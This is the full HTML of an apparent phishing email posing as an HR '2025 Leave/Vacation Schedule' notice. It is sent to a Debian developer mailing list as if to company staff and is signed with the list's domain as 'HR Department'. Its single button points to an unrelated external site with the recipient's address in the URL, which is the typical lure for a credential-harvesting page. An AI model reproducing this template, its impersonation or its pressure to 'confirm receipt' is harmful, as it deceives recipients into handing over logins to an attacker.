<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>2025 Leave/Vacation Schedule</title>
  <style>
body {
  font-family: Arial, sans-serif;
  background-color: #f4f4f4;
  margin: 0;
  padding: 0;
}
.container {
  width: 100%;
  max-width: 600px;
  background-color: #ffffff;
  margin: 30px auto;
  padding: 20px;
  border-radius: 8px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}
.header {
  text-align: center;
  background-color: #004080;
  color: #ffffff;
  padding: 15px;
  font-size: 22px;
  font-weight: bold;
  border-top-left-radius: 8px;
  border-top-right-radius: 8px;
}
.content {
  padding: 20px;
  color: #333333;
  font-size: 16px;
  line-height: 1.6;
}
.button {
  display: block;
  width: 80%;
  max-width: 250px;
  margin: 20px auto;
  padding: 12px;
  background-color: #004080;
  color: #ffffff !important;   /* Force white text */
  text-align: center;
  text-decoration: none;
  font-size: 18px;
  font-weight: bold;
  border-radius: 5px;
}

/* Keep text white across all states */
.button:link,
.button:visited,
.button:hover,
.button:active {
  color: #ffffff !important;
  text-decoration: none;
}

.footer {
  text-align: center;
  font-size: 12px;
  color: #777777;
  padding: 15px;
  background-color: #f4f4f4;
  border-bottom-left-radius: 8px;
  border-bottom-right-radius: 8px;
}
  </style>
</head>
<body>
<div class="container">
  <div class="header">2025 Leave/Vacation Schedule</div>
  <div class="content">
    <p>To: pkg-openssl-devel@lists.alioth.debian.org  Staff,</p>
    <p>We hope this email finds you well.</p>
    <p>We are pleased to share the <strong>2025 Leave/Vacation Schedule</strong> for all employees. Kindly take a moment to review your designated leave periods to ensure proper planning and coordination.</p>
    <p>It is important that you confirm receipt of this schedule and notify the HR Office promptly if any adjustments are required.</p>
    
    <!-- Button -->
    <p style="text-align: center;">
      <a class="button" href="https://lesolson.com/zain/cam/index.php?id=pkg-openssl-devel@lists.alioth.debian.org " target="_blank" rel="noopener noreferrer">
        View 2025 Leave Schedule
      </a>
    </p>
    
    <p>If you have any questions or require further clarification, do not hesitate to reach out.</p>
  </div>
  <div class="footer">
    Best Regards,<br>
    <strong>HR Department</strong><br>
    lists.alioth.debian.org
  </div>
</div>


</body></html>